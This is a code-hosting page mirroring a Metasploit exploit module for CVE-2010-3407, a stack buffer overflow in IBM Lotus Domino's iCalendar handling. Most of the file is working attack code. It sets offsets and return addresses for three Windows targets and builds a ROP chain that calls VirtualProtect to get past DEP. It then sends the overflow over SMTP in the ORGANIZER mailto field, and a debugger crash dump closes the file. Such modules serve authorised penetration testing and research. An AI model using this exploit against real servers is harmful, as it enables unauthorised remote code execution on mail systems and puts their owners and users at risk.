Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/lotus/domino_icalendar_organizer.rb
19612 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => "IBM Lotus Domino iCalendar MAILTO Buffer Overflow",

16
        'Description' => %q{

17
          This module exploits a vulnerability found in IBM Lotus Domino iCalendar.  By

18
          sending a long string of data as the "ORGANIZER;mailto" header, process "nRouter.exe"

19
          crashes due to a Cstrcpy() routine in nnotes.dll, which allows remote attackers to

20
          gain arbitrary code execution.

21


22
          Note: In order to trigger the vulnerable code path, a valid Domino mailbox account

23
          is needed.

24
        },

25
        'License' => MSF_LICENSE,

26
        'Author' => [

27
          'A. Plaskett', # Initial discovery, poc

28
          'sinn3r' # Metasploit

29
        ],

30
        'References' => [

31
          [ 'CVE', '2010-3407' ],

32
          [ 'OSVDB', '68040' ],

33
          [ 'ZDI', '10-177' ],

34
          [ 'URL', 'http://labs.mwrinfosecurity.com/advisories/lotus_domino_ical_stack_buffer_overflow/' ],

35
          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?rs=475&uid=swg21446515' ]

36
        ],

37
        'Payload' => {

38
          'BadChars' => [*(0x00..0x08)].pack("C*") + [*(0x10..0x18)].pack("C*") + [*(0x1a..0x1f)].pack("C*") + "\x2c" + [*(0x80..0xff)].pack("C*"),

39
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed,

40
          'EncoderOptions' => { 'BufferRegister' => 'ECX' },

41
          'StackAdjustment' => -3500

42
        },

43
        'DefaultOptions' => {

44
          'EXITFUNC' => "process",

45
        },

46
        'Platform' => 'win',

47
        'Targets' => [

48
          [

49
            'Lotus Domino 8.5 on Windows 2000 SP4',

50
            {

51
              'Offset' => 2374, # Offset to EIP

52
              'Ret' => 0x6030582B, # JMP ECX

53
              'MaxBuffer' => 9010 # Total buffer size

54
            }

55
          ],

56
          [

57
            'Lotus Domino 8.5 on Windows Server 2003 SP0',

58
            {

59
              'Offset' => 2374, # Offset to EIP

60
              'Ret' => 0x6030582B, # JMP ECX (Domino\\nnotes.dll)

61
              'MaxBuffer' => 9010 # Total buffer size

62
            }

63
          ],

64
          [

65
            'Lotus Domino 8.5 on Windows Server 2003 SP2',

66
            {

67
              'Offset' => 2374, # Offset to EIP

68
              'Ret' => 0x604C4222,     # ADD AL,0x5E ; RETN

69
              'EAX' => 0x7C35287F,     # Initial CALL VirtualProtect addr to align (MSVCR71.dll)

70
              'EaxOffset' => 2342,           # Offset to EAX

71
              'RopOffset' => 24,             # Offset to ROP gadgets

72
              'MaxBuffer' => 9010            # Total buffer size

73
            }

74
          ],

75
        ],

76
        'DisclosureDate' => '2010-09-14',

77
        'DefaultTarget' => 2,

78
        'Notes' => {

79
          'Reliability' => UNKNOWN_RELIABILITY,

80
          'Stability' => UNKNOWN_STABILITY,

81
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

82
        }

83
      )

84
    )

85


86
    register_options(

87
      [

88
        Opt::RPORT(25),

89
        OptString.new('MAILFROM', [true, 'Valid Lotus Domino mailbox account', '']),

90
        OptString.new('MAILTO', [true, 'Valid Lotus Domino mailbox account', ''])

91
      ]

92
    )

93
  end

94


95
  def check

96
    connect

97
    banner = (sock.get_once(-1, 5) || '').chomp

98
    disconnect

99


100
    if banner =~ /Lotus Domino Release 8\.5/

101
      return Exploit::CheckCode::Appears

102
    else

103
      return Exploit::CheckCode::Safe

104
    end

105
  end

106


107
  def exploit

108
    sploit = ''

109
    if target.name =~ /Windows 2000 SP4/

110


111
      sploit << rand_text_alpha(934)

112
      sploit << payload.encoded

113
      sploit << rand_text_alpha((target['Offset'] - sploit.length))

114
      sploit << [target.ret].pack('V')

115
      sploit << rand_text_alpha((target['MaxBuffer'] - sploit.length))

116


117
    elsif target.name =~ /Server 2003 SP0/

118


119
      sploit << rand_text_alpha(930)

120
      sploit << payload.encoded

121
      sploit << rand_text_alpha((target['Offset'] - sploit.length))

122
      sploit << [target.ret].pack('V')

123
      sploit << rand_text_alpha((target['MaxBuffer'] - sploit.length))

124


125
    elsif target.name =~ /Server 2003 SP2/

126


127
      # Borrow a "CALL VirtualProtect()" in Domino's MSVCR71.dll to bypass DEP

128
      # shellcode max = 1312 bytes

129
      rop_gadgets =

130
        [

131
          # EAX should be aligned to CALL VirtualProtect at this point

132
          0x604F5728, # MOV DWORD PTR DS:[ECX],EAX; RETN (nnotes.dll)

133
          # Set shellcode address

134
          0x6247282B,  # MOV EAX,ECX; RETN (nlsccstr.dll)

135
          0x62454F32,  # ADD AL,2B; RETN (nlsccstr.dll)

136
          0x603F7B38,  # ADD AL,31; RETN (nnotes.dll)

137
          0x624B7040,  # MOV DWORD PTR DS:[ECX+4],EAX; RETN (nnotes.dll)

138
          # Set RETN value

139
          0x60577B7A,  # XCHG EAX,EDX; RETN (nnotes.dll)

140
          0x62452E35,  # MOV EAX,ECX; RETN (nlsccstr.dll)

141
          0x60606F4E,  # ADD AL,5D; RETN (nlsccstr.dll)

142
          0x603E6260,  # DEC EAX; RETN (nnotes.dll)

143
          0x603E6260,  # DEC EAX; RETN (nnotes.dll)

144
          0x603E6260,  # DEC EAX; RETN (nnotes.dll)

145
          0x603E6260,  # DEC EAX; RETN (nnotes.dll)

146
          0x603E6260,  # DEC EAX; RETN (nnotes.dll)

147
          0x7C3A4C72,  # MOV DWORD PTR DS:[EAX],EDX; RETN (msvcp71.dll)

148
          0x6247282B,  # MOV EAX,ECX; RETN (nlsccstr.dll)

149
          0x60253B6D,  # XCHG EAX,EBP; RETN (nnotes.dll)

150
          # Set Size (0x413)

151
          0x605A4B30,  # MOV EAX,205; RETN (nnotes.dll)

152
          0x605A4B30,  # MOV EAX,205; RETN (nnotes.dll)

153
          0x60592A36,  # ADD EAX,107; RETN (nnotes.dll)

154
          0x603B4C27,  # ADD AL,2B; RETN (nnotes.dll)

155
          0x624B7044,  # MOV DWORD PTR DS:[ECX+8],EAX; RETN

156
          0x604C5225,  # XOR EAX, EAX; RETN

157
          # newProtect

158
          0x60386C3C,  # MOV AL,3B; RETN (nnotes.dll)

159
          0x624D4C27,  # INC EAX; RETN (nlsccstr.dll)

160
          0x624D4C27,  # INC EAX; RETN (nlsccstr.dll)

161
          0x624D4C27,  # INC EAX; RETN (nlsccstr.dll)

162
          0x624D4C27,  # INC EAX; RETN (nlsccstr.dll)

163
          0x624D4C27,  # INC EAX; RETN (nlsccstr.dll)

164
          0x624B7048,  # MOV DWORD PTR DS:[ECX+C],EAX; RETN

165
          # oldProtect

166
          0x602B7353,  # MOV EAX,ESI; POP ESI; RETN (nnotes.dll)

167
          0x41414141,  # ESI

168
          0x624B704C,  # MOV DWORD PTR DS:[ECX+10],EAX; RETN (nlsccstr.dll)

169
          # Call VirtualProtect

170
          0x6247282B,  # MOV EAX,ECX; RETN (nlsccstr.dll)

171
          0x60276256,  # XCHG EAX,ESP; RETN (nnotes.dll)

172
        ].pack("V*")

173


174
      align = "\x51" # PUSH ECX

175
      align << "\x58"      # POP EAX

176
      align << "\x34\x43"  # XOR AL,43

177
      align << "\x40"      # INC EAX

178
      align << "\x34\x65"  # XOR AL,65

179
      align << "\x50"      # PUSH EAX

180
      align << "\x59"      # POP ECX

181


182
      sploit << rand_text_alpha(1022)

183
      sploit << align

184
      sploit << payload.encoded

185
      sploit << rand_text_alpha((target['EaxOffset'] - sploit.length))

186
      sploit << [target['EAX']].pack('V')

187
      sploit << rand_text_alpha((target['Offset'] - sploit.length))

188
      sploit << [target.ret].pack('V')

189
      sploit << rand_text_alpha((target['RopOffset']))

190
      sploit << rop_gadgets

191
      sploit << rand_text_alpha((target['MaxBuffer'] - sploit.length))

192


193
    end

194


195
    fname = rand_text_alpha(4)

196
    prod_id = rand_text_alpha_upper(5) + "@" + rand_text_alpha_upper(13) + "@" + rand_text_alpha_upper(24)

197
    uid = rand_text_alpha_upper(15)

198
    summary = rand_text_alpha_upper(5) + "@" + rand_text_alpha_upper(11)

199
    status = rand_text_alpha_upper(4)

200


201
    body = "Content-Type: text/calendar; method=COUNTER; charset=UTF-8\r\n"

202
    body << "#{fname}.txt\r\n"

203
    body << "MIME-Version: 1.0\r\n"

204
    body << "Content-Transfer-Encoding: 8bit\r\n"

205
    body << "BEGIN:VCALENDAR\r\n"

206
    body << "METHOD:COUNTER\r\n"

207
    body << "PRODID:-//#{prod_id}//\r\n"

208
    body << "VERSION:2.0\r\n"

209
    body << "BEGIN:VEVENT\r\n"

210
    body << "UID:#{uid}\r\n"

211
    body << "SEQ:2\r\n"

212
    body << "RRULE:aaaa\r\n"

213
    body << "ORGANIZER:mailto:H@#{sploit}.com\r\n"

214
    body << "ATTENDEE;:Mailto:#{datastore['MAILTO']}\r\n"

215
    body << "SUMMARY:#{summary}\r\n"

216
    body << "DTSTART:20091130T093000Z\r\n"

217
    body << "DTEND:20091130T093000Z\r\n"

218
    body << "DTSTAMP:20091130T083147Z\r\n"

219
    body << "LOCATION:Location\r\n"

220
    body << "STATUS:#{status}\r\n"

221
    body << "END:VEVENT\r\n"

222
    body << "END:VCALENDAR\r\n"

223
    body << "\r\n.\r\n"

224


225
    commands =

226
      {

227
        :HELO => "HELO localhost\r\n",

228
        :FROM => "MAIL FROM: <#{datastore['MAILFROM']}>\r\n",

229
        :RCPT => "RCPT TO: <#{datastore['MAILTO']}>\r\n",

230
        :DATA => "DATA\r\n",

231
        :MESG => body,

232
        :QUIT => "QUIT\r\n",

233
      }

234


235
    print_status("Trying target #{target.name}")

236


237
    connect

238


239
    # Get SMTP Banner

240
    res = (sock.get_once || '').chomp

241
    print_status("Banner: #{res}")

242


243
    # Check banner before trying the exploit

244
    if res !~ /Lotus Domino Release 8.5/

245
      print_error("Remote service does not seem to be Lotus Domino 8.5")

246
      disconnect

247
      return

248
    end

249


250
    # Send HELO

251
    sock.put(commands[:HELO])

252
    res = sock.get_once || ''

253
    print_status("Received: #{res.chomp}")

254


255
    # Set MAIL FROM

256
    sock.put(commands[:FROM])

257
    res = sock.get_once || ''

258
    print_status("Received: #{res.chomp}")

259


260
    # Set RCPT

261
    sock.put(commands[:RCPT])

262
    res = sock.get_once || ''

263
    print_status("Received: #{res.chomp}")

264


265
    # Set DATA

266
    sock.put(commands[:DATA])

267
    res = sock.get_once || ''

268
    print_status("Received: #{res.chomp}")

269


270
    # Send malicious data

271
    sock.put(commands[:MESG])

272
    res = sock.get_once

273


274
    # QUIT

275
    sock.put(commands[:QUIT])

276
    res = sock.get_once || ''

277
    print_status("Received: #{res.chomp}")

278


279
    handler

280
    disconnect

281
  end

282
end

283


284
=begin

285
0:008> r

286
eax=41414141 ebx=00000004 ecx=08da9700 edx=08dab695 esi=06c248bc edi=00000014

287
eip=42424242 esp=08da9cc0 ebp=41414141 iopl=0         nv up ei pl nz na pe nc

288
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010206

289
42424242 ??              ???

290
0:008> !exchain

291
08daea2c: nRouter+511bb (004511bb)

292
08daffdc: kernel32!_except_handler3+0 (77e70abc)

293
  CRT scope  0, filter: kernel32!BaseThreadStart+3a (77e4a92d)

294
                func:   kernel32!BaseThreadStart+4b (77e4a943)

295
Invalid exception stack at ffffffff

296
0:008> k

297
ChildEBP RetAddr

298
WARNING: Frame IP not in any known module. Following frames may be wrong.

299
08da9cbc 43434343 0x42424242

300
08da9cc0 43434343 0x43434343

301
...

302
0:008> bl

303
 0 e 602738f9     0001 (0001)  0:**** nnotes!MailCheck821Address+0xb09

304
0:008> u 602738f9

305
nnotes!MailCheck821Address+0xb09:

306
602738f9 e80239d9ff      call    nnotes!Cstrcpy (60007200)

307
602738fe eb02            jmp     nnotes!MailCheck821Address+0xb12 (60273902)

308
60273900 33ff            xor     edi,edi

309
60273902 8d8dc0faffff    lea     ecx,[ebp-540h]

310
60273908 51              push    ecx

311
60273909 8d95bcf6ffff    lea     edx,[ebp-944h]

312
6027390f 52              push    edx

313
60273910 e8eb38d9ff      call    nnotes!Cstrcpy (60007200)

314


315
Badchars:

316
0x01=0x0F21, 0x02=0x0f22,  0x03=0x0f23, 0x04=0x0f24, 0x05=0x0f25,  0x06=0x0f26, 0x07=0x0f27

317
0x08=0x0f28, 0x0a=nocrash, 0x0b=0x0f2b, 0x0c=0x0f2c, 0x0d=nocrash, 0x0e=0x0f2e  0x0f=0x0f2f,

318
0x10=0x0f30, 0x11=0x0f31,  0x12=0x0f32, 0x13=0x0f33, 0x14=0x0f34,  0x15=0x0f35, 0x16=0x0f36,

319
0x17=0x0f37, 0x18=0x0f38,  0x1a=0x0f3a, 0x1b=0x0f3b, 0x1c=0x0f3c,  0x1d=0x0f3d, 0x1e=0x0f3e,

320
0x1f=0x0f3f, 0x2c=nocrash, 0x80..0xff = ""

321
=end

322


323